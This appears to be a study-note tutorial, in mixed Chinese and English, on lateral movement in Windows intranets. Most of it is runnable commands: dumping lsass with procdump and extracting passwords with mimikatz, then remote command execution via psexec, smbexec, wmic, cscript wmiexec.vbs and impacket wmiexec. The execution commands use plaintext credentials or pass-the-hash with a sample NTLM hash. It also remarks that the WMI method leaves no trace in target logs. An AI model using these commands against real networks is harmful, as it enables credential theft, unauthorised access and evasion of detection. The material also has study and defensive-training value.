Intranet Security: Lateral Delivery Attacks.
Lateral movement is to take down a host of the other party, use the captured host as a springboard, and then infiltrate other hosts in the intranet, and use existing resources to try to obtain more credentials and higher permissions. Take down more hosts step by step, and then achieve the purpose of controlling the entire intranet, obtaining the highest authority, and launching advanced persistent threat attacks. (Pass-through attacks are mainly based on plaintext and Hash value acquisition. )
Table of contents:
Intranet Security: Lateral Delivery Attacks.
Procdump+Mimikatz cooperates to obtain the target host password:
SMB service utilization (psexec || smbexec)
WMI service utilization. (wmic ||cscript || wmiexec)
(1) Comes with WMIC, there is no echo in clear text transmission.
(3) Suite [impacket] wmiexec plaintext or hash transmission has an echo exe version
Procdump+Mimikatz cooperates to obtain the target host password:
下载procdump工具:https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump
下载Mimikatz工具:https://github.com/gentilkiwi/mimikatz/releases想方法把 procdump 上传在目标主机上.然后执行这个命令,生成一个 lsass.dmp 文件.(再把他下载在我们主机上进行分析)
procdump -accepteula -ma lsass.exe lsass.dmp
在 mimikatz 上执行:
(1)privilege::debug
(2)sekurlsa::minidump lsass.dmp
(3)sekurlsa::logonPasswords full
SMB service utilization (psexec || smbexec)
利用 SMB 服务可以通过明文或 hash 传递来远程执行,条件 445 服务端口开放.
工具下载:https://learn.microsoft.com/zh-cn/sysinternals/downloads/pstoolspsexec exploits:
(1)Psexec第一种:先有 ipc 链接,psexec 需要明文或 hash 传递.net use \\192.168.0.101\ipc$ "admin" /user:Administrator // ipc 链接
net use \\目标主机的 IP 地址\ipc$ "目标密码" /user:目标账号psexec \\192.168.0.101 -s cmd //-s 以 System 权限运行
psexec \\目标主机 IP 地址 -s cmd
(2)Psexec 第二种:不用建立 IPC 直接提供明文账户密码.[推荐使用]psexec \\192.168.0.101 -u administrator -p admin -s cmd // 使用明文连接
psexec \\目标主机 IP 地址 -u 账号 -p 密码 -s cmd
密文是在哪收集的.
impacket 工具下载:https://gitee.com/RichChigga/impacket-examples-windows/repository/archive/master.zip
直接执行是不行的,所以需要使用impacket工具.
psexec -hashes :哈希值密码 ./账号@目标 IP 地址(组)
psexec -hashes :哈希值密码 域名/账号@目标 IP 地址(域)
psexec -hashes :209c6174da490caeb422f3fa5a7ae634 ./[email protected]
smbexec exploits:
smbexec 无需先 ipc 链接 明文或 hash 传递.【使用 impacket 工具】(1)smbexec god/administrator:[email protected] (域名的连接)
#smbexec 域名/账号:密码@目标的IP地址
(2)smbexec ./administrator:[email protected] (组的连接)
#smbexec ./账号:密码@目标的IP地址
(3)smbexec -hashes :209c6174da490caeb422f3fa5a7ae634 ./[email protected]
#smbexec -hashes :密文 ./账号@目标的IP地址
(4)smbexec -hashes :209c6174da490caeb422f3fa5a7ae634 god/[email protected]
#smbexec -hashes :密文 域名/账号@目标的IP地址
WMI service utilization. (wmic ||cscript || wmiexec)
WMI 服务是通过 135 端口进行利用,支持用户名明文或者 hash 的方式进行认证,并且该方法不会在
目标日志系统留下痕迹.(1) Comes with WMIC, there is no echo in clear text transmission.
wmic /node:192.168.0.101 /user:administrator /password:admin process call create "cmd.exe /c ipconfig >C:\1.txt"
(2) The built-in cscript has an echo in the plaintext transmission. [Need to download the wmiexec.vbs tool]
cscript //nologo wmiexec.vbs /shell 192.168.0.101 administrator admin
cscript //nologo wmiexec.vbs /shell 目标IP地址 账号 密码
(3) Suite [impacket] wmiexec plaintext or hash transmission has an echo exe version
wmiexec ./administrator:[email protected] "whoami" 【文明连接】
wmiexec -hashes :209c6174da490caeb422f3fa5a7ae634 ./[email protected] "whoami"
【密文连接】
wmiexec ./账号:密码@目标主机的IP地址 "你想要回显信息的命令"【组】
wmiexec 域名/账号:密码@目标主机的IP地址 "你想要回显信息的命令"【域】
Learning link: Day 67: Intranet security - domain horizontal smb&wmi plaintext or hash transfer_哔哩哔哩_bilibili